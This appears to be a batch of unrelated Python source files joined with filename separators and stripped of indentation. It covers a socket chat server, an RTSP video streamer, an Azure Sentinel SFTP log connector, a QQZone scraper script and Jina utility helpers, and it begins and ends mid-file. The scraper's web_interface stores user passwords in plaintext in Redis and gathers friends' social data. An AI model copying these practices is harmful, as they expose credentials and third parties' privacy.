client.close()
#Prints disconected message on server
print(f"Client({address}) has chosen to disconect")
break
#Runs the normal message reciver
else:
#Prints client message confirmation on server
print(f"recived '{message}' from Client({address})")
#Sends message confirmation to client
client.send(f"SERVER : '{message}' recived by server".encode('ascii'))
#Closes connection on error
except:
client.close()
print(f"Client({address}) has disconected // ERROR occured!")
break
#Closes thread
else:
sys.exit()
#Runs the server (accepts new connections and creates a thread for client handler function)
def runServer():
#Prints confirmation message
print("The server is running")
#port = input("Give port : ")
while True:
#Acnoleges and accepts client connection
client, address = server.accept()
print(f"Connection achived with Client({str(address)})")
#Gives client the connection confirmation
client.send('You have been connected to the server'.encode('ascii'))
#Creates a thread to handle the connected client
thread = threading.Thread(target = clientHandler, args = (client, address))
thread.start()
#Call to the runServer main method
runServer()
|
server.py
|
import socket
from time import sleep
from threading import Thread
from typing import Union
from utils.video_stream import VideoStream
from utils.rtsp_packet import RTSPPacket
from utils.rtp_packet import RTPPacket
class Server:
FRAME_PERIOD = 1000//VideoStream.DEFAULT_FPS # in milliseconds
SESSION_ID = '123456'
DEFAULT_HOST = '127.0.0.1'
DEFAULT_CHUNK_SIZE = 4096
# for allowing simulated non-blocking operations
# (useful for keyboard break)
RTSP_SOFT_TIMEOUT = 100 # in milliseconds
class STATE:
INIT = 0
PAUSED = 1
PLAYING = 2
FINISHED = 3
TEARDOWN = 4
def __init__(self, rtsp_port: int):
self._video_stream: Union[None, VideoStream] = None
self._rtp_send_thread: Union[None, Thread] = None
self._rtsp_connection: Union[None, socket.socket] = None
self._rtp_socket: Union[None, socket.socket] = None
self._client_address: (str, int) = None
self.server_state: int = self.STATE.INIT
self.rtsp_port = rtsp_port
def _rtsp_recv(self, size=DEFAULT_CHUNK_SIZE) -> bytes:
recv = None
while True:
try:
recv = self._rtsp_connection.recv(size)
break
except socket.timeout:
continue
print(f"Received from client: {repr(recv)}")
return recv
def _rtsp_send(self, data: bytes) -> int:
print(f"Sending to client: {repr(data)}")
return self._rtsp_connection.send(data)
def _get_rtsp_packet(self) -> RTSPPacket:
return RTSPPacket.from_request(self._rtsp_recv())
def _wait_connection(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = self.DEFAULT_HOST, self.rtsp_port
s.bind(address)
print(f"Listening on {address[0]}:{address[1]}...")
s.listen(1)
print("Waiting for connection...")
self._rtsp_connection, self._client_address = s.accept()
self._rtsp_connection.settimeout(self.RTSP_SOFT_TIMEOUT/1000.)
print(f"Accepted connection from {self._client_address[0]}:{self._client_address[1]}")
def _wait_setup(self):
if self.server_state != self.STATE.INIT:
raise Exception('server is already setup')
while True:
packet = self._get_rtsp_packet()
if packet.request_type == RTSPPacket.SETUP:
self.server_state = self.STATE.PAUSED
print('State set to PAUSED')
self._client_address = self._client_address[0], packet.rtp_dst_port
self._setup_rtp(packet.video_file_path)
self._send_rtsp_response(packet.sequence_number)
break
def setup(self):
self._wait_connection()
self._wait_setup()
def _start_rtp_send_thread(self):
self._rtp_send_thread = Thread(target=self._handle_video_send)
self._rtp_send_thread.setDaemon(True)
self._rtp_send_thread.start()
def _setup_rtp(self, video_file_path: str):
print(f"Opening up video stream for file {video_file_path}")
self._video_stream = VideoStream(video_file_path)
print('Setting up RTP socket...')
self._rtp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._start_rtp_send_thread()
def handle_rtsp_requests(self):
print("Waiting for RTSP requests...")
# main thread will be running here most of the time
while True:
packet = self._get_rtsp_packet()
# assuming state will only ever be PAUSED or PLAYING at this point
if packet.request_type == RTSPPacket.PLAY:
if self.server_state == self.STATE.PLAYING:
print('Current state is already PLAYING.')
continue
self.server_state = self.STATE.PLAYING
print('State set to PLAYING.')
elif packet.request_type == RTSPPacket.PAUSE:
if self.server_state == self.STATE.PAUSED:
print('Current state is already PAUSED.')
continue
self.server_state = self.STATE.PAUSED
print('State set to PAUSED.')
elif packet.request_type == RTSPPacket.TEARDOWN:
print('Received TEARDOWN request, shutting down...')
self._send_rtsp_response(packet.sequence_number)
self._rtsp_connection.close()
self._video_stream.close()
self._rtp_socket.close()
self.server_state = self.STATE.TEARDOWN
# for simplicity's sake, caught on main_server
raise ConnectionError('teardown requested')
else:
# will never happen, since exception is raised inside `parse_rtsp_request()`
# raise InvalidRTSPRequest()
pass
self._send_rtsp_response(packet.sequence_number)
def _send_rtp_packet(self, packet: bytes):
to_send = packet[:]
while to_send:
try:
self._rtp_socket.sendto(to_send[:self.DEFAULT_CHUNK_SIZE], self._client_address)
except socket.error as e:
print(f"failed to send rtp packet: {e}")
return
# trim bytes sent
to_send = to_send[self.DEFAULT_CHUNK_SIZE:]
def _handle_video_send(self):
print(f"Sending video to {self._client_address[0]}:{self._client_address[1]}")
while True:
if self.server_state == self.STATE.TEARDOWN:
return
if self.server_state != self.STATE.PLAYING:
sleep(0.5) # diminish cpu hogging
continue
if self._video_stream.current_frame_number >= VideoStream.VIDEO_LENGTH-1: # frames are 0-indexed
print('Reached end of file.')
self.server_state = self.STATE.FINISHED
return
frame = self._video_stream.get_next_frame()
frame_number = self._video_stream.current_frame_number
rtp_packet = RTPPacket(
payload_type=RTPPacket.TYPE.MJPEG,
sequence_number=frame_number,
timestamp=frame_number*self.FRAME_PERIOD,
payload=frame
)
print(f"Sending packet #{frame_number}")
print('Packet header:')
rtp_packet.print_header()
packet = rtp_packet.get_packet()
self._send_rtp_packet(packet)
sleep(self.FRAME_PERIOD/1000.)
def _send_rtsp_response(self, sequence_number: int):
response = RTSPPacket.build_response(sequence_number, self.SESSION_ID)
self._rtsp_send(response.encode())
print('Sent response to client.')
|
__init__.py
|
import requests
import datetime
import dateutil
import logging
import gzip
import io
import csv
import time
import os
import sys
import json
import hashlib
import hmac
import base64
import pysftp
from threading import Thread
from io import StringIO
import azure.functions as func
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
sentinel_log_type = os.environ.get('LogAnalyticsCustomLogName')
sfcc_sftp_username = os.environ.get('SfccSftpUsername')
sfcc_sftp_password = os.environ.get('SfccSftpPassword')
sfcc_sftp_filename = os.environ.get('SfccSftpFilename')
sfcc_sftp_filepath = os.environ.get('SfccSftpFilepath')
sfcc_sftp_host = os.environ.get('SfccSftpHost')
sfcc_sftp_cnopts = os.environ.get('SfccSftpCnopts')
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
#get files via SFTP
with pysftp.Connection(sfcc_sftp_host, username=sfcc_sftp_username, password=sfcc_sftp_password, private_key=".ppk", cnopts=sfcc_sftp_cnopts) as sftp:
sftp.cwd(sfcc_sftp_filepath)
sftpFile = sftp.get(sfcc_sftp_filename)
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
with open(sftpFile, "r") as read_file:
data = json.load(read_file)
for entry in data:
with sentinel:
sentinel.send(entry)
class AzureSentinelConnector:
def __init__(self, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
self.failedToSend = False
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body, sort_keys=True)
print(body)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = 'https://' + customer_id + '.ods.opinsights.azure.com' + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
print(response.status_code)
self.successfull_sent_events_number += events_number
self.failedToSend = False
else:
print(response.status_code)
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
self.failedToSend = True
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
|
main.py
|
import sys
import os
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(os.path.split(rootPath)[0])
print(sys.path)
from src.analysis.QQZoneAnalysis import QQZoneAnalysis
from src.spider.QQZoneSpider import QQZoneSpider
from src.util.constant import WEB_SPIDER_INFO, CLEAN_DATA_KEY, LOGIN_FAILED, \
USER_MAP_KEY, GET_MOOD_FAILED, MOOD_FINISH_KEY, WAITING_USER_LIST, FINISH_USER_NUM_KEY, USER_LOGIN_STATE
import threading
def capture_main_data():
"""
获取爬虫数据
:return:
"""
print(sys.path)
sp = QQZoneSpider(use_redis=True, debug=True, download_small_image=False, download_big_image=False)
sp.login_with_qr_code()
sp.get_main_page_info()
sp.get_mood_list()
sp.user_info.save_user(sp.username)
def capture_main_data_and_analysis():
"""
开启爬虫并分析数据
:return:
"""
qa = QQZoneAnalysis(use_redis=False, debug=True, stop_time='2011-11-11', mood_num=20, analysis_friend=False)
qa.login_with_qr_code()
qa.get_main_page_info()
qa.get_mood_list()
if qa.analysis_friend:
qa.thread_num = 20
qa.get_friend_detail()
do_analysis_for_all(qa)
qa.user_info.save_user()
# 提供给web的接口
def web_interface(username, nickname, stop_time, mood_num, cookie_text, no_delete, password, pool_flag):
sp = QQZoneAnalysis(use_redis=True, debug=False, username=username, analysis_friend=True, from_web=True,
nickname=nickname, stop_time=stop_time, mood_num=mood_num, no_delete=no_delete, cookie_text=cookie_text, pool_flag=pool_flag)
sp.re.hset(USER_MAP_KEY, username, password)
sp.re.set(USER_LOGIN_STATE + username, 0)
sp.logging_info(username + " init web info success")
try:
state = sp.login_with_qr_code()
sp.remove_qr_code()
# 登陆失败就退出本线程
if not state:
sp.logging_info(username + " logging failed")
sp.re.rpush(WEB_SPIDER_INFO + username, LOGIN_FAILED)
exit(1)
else:
# 存储登陆状态
sp.logging_info(username + " logging success")
sp.re.rpush(WEB_SPIDER_INFO + username, "用户" + str(sp.username) + "登陆成功")
sp.re.set(USER_LOGIN_STATE + username, 1)
except BaseException as e:
sp.format_error(e, "logging failed")
sp.logging_info(username + "logging failed")
sp.re.rpush(WEB_SPIDER_INFO + username, LOGIN_FAILED)
exit(1)
sp.get_main_page_info()
sp.logging_info("get main page success")
try:
# 获取动态的数据
t1 = threading.Thread(target=sp.get_mood_list)
# 获取好友数据
t2 = threading.Thread(target=sp.get_friend_detail)
t1.setDaemon(False)
t2.setDaemon(False)
t1.start()
t2.start()
# 等待两个线程都结束
t1.join()
t2.join()
# sp.user_info.save_user(username)
except BaseException:
sp.re.rpush(WEB_SPIDER_INFO + username, GET_MOOD_FAILED)
exit(1)
sp.re.set(MOOD_FINISH_KEY + str(username), 1)
sp.logging_info("finish to capture data")
sp.logging_info("begin to analysis...")
# 在爬虫完成之后分析所有数据
do_analysis_for_all(sp)
sp.user_info.save_user()
sp.logging_info("finish to analysis")
sp.re.set(CLEAN_DATA_KEY + username, 1)
now_user = sp.re.get(FINISH_USER_NUM_KEY)
if now_user is None:
now_user = 0
else:
now_user = int(now_user)
sp.re.set(FINISH_USER_NUM_KEY, now_user + 1)
# 对排队list中删除当前用户,注意该指令的传参方式在不同redis版本中有差异
sp.re.lrem(WAITING_USER_LIST, 0, username)
sp.logging_info("finish to delete user from waiting list")
sp.logging_info("Success!")
def get_user_basic_info():
sp = QQZoneSpider(use_redis=True, debug=False, mood_begin=0, mood_num=-1,
stop_time='2015-06-01',
download_small_image=False, download_big_image=False,
download_mood_detail=True, download_like_detail=True,
download_like_names=True, recover=False, cookie_text=None)
return sp.user_info
def do_analysis_for_all(sp):
"""
分析所有指标
:param sp: QQZoneAnalysis的实例化对象
:return:
"""
# 清洗好友数据
if sp.analysis_friend:
friend_data_state = sp.clean_friend_data()
if friend_data_state:
# 获取第一位好友数据
sp.get_first_friend_info()
# 计算共同好友最多的人
sp.get_most_common_friend()
# 计算共同群组
sp.get_most_group()
sp.get_useful_info_from_json()
if not sp.mood_data_df.empty:
# 清洗说说数据并计算点赞最多的人和评论最多的人
sp.get_most_people()
# 计算发送动态的时间
sp.calculate_send_time()
sp.draw_cmt_cloud(sp.mood_data_df)
sp.draw_like_cloud(sp.mood_data_df)
# 说说中的关键字,这个比较花时间
# sp.draw_content_cloud(sp.mood_data_df)
# 保存说说数据
sp.export_mood_df()
sp.calculate_history_like_agree()
def generate_friend_info():
"""
获取好友的空间数据并进行数据分析
:return:
"""
qa = QQZoneAnalysis(use_redis=False, debug=False, analysis_friend=False)
# 建议在resource/config/friend_info.json中配置需要爬取的好友QQ号
# 也可以直接在这里传入qq号,此处传入的QQ号优先级比配置文件大,但是配置文件可以批量传入QQ号
qa.get_friend_mood(friend_qq='')
do_analysis_for_all(qa)
if __name__ == '__main__':
# generate_friend_info()
capture_main_data_and_analysis()
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
from . import __windows__
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
Usage, kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
With level 0 means warning, level 1 means exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def deprecated_method(new_function_name):
def deco(func):
def wrapper(*args, **kwargs):
warnings.warn(
f'`{func.__name__}` is renamed to `{new_function_name}`, the usage of `{func.__name__}` is '
f'deprecated and will be removed.',
DeprecationWarning,
)
return func(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = []
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
elif isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
elif isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if __windows__:
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
fmt_str = '\033[1;%dm' if self._bold else '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
def warn_unknown_args(unknown_args: List[str]):
"""Creates warnings for all given arguments.
:param unknown_args: arguments that are possibly unknown to Jina
"""
from cli.lookup import _build_lookup_table
all_args = _build_lookup_table()[0]
has_migration_tip = False
real_unknown_args = []
warn_strs = []
for arg in unknown_args:
if arg.replace('--', '') not in all_args:
from .parsers.deprecated import get_deprecated_replacement
new_arg = get_deprecated_replacement(arg)
if new_arg:
if not has_migration_tip:
warn_strs.append('Migration tips:')
has_migration_tip = True
warn_strs.append(f'\t`{arg}` has been renamed to `{new_arg}`')
real_unknown_args.append(arg)
if real_unknown_args:
warn_strs = [f'ignored unknown argument: {real_unknown_args}.'] + warn_strs
warnings.warn(''.join(warn_strs))
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]],
parser: ArgumentParser,
warn_unknown: bool = False,
fallback_parsers: List[ArgumentParser] = None,
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:param warn_unknown: True, if unknown arguments should be logged
:param fallback_parsers: a list of parsers to help resolving the args
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
p_args, unknown_args = parser.parse_known_args(args)
if warn_unknown and unknown_args:
_leftovers = set(unknown_args)
if fallback_parsers:
for p in fallback_parsers:
_, _unk_args = p.parse_known_args(args)
_leftovers = _leftovers.intersection(_unk_args)
if not _leftovers:
# all args have been resolved
break
warn_unknown_args(_leftovers)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
_defaults = vars(parser.parse_args([]))
return {
k: v
for k, v in vars(args).items()
if k in _defaults and k not in taboo and _defaults[k] != v
}
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
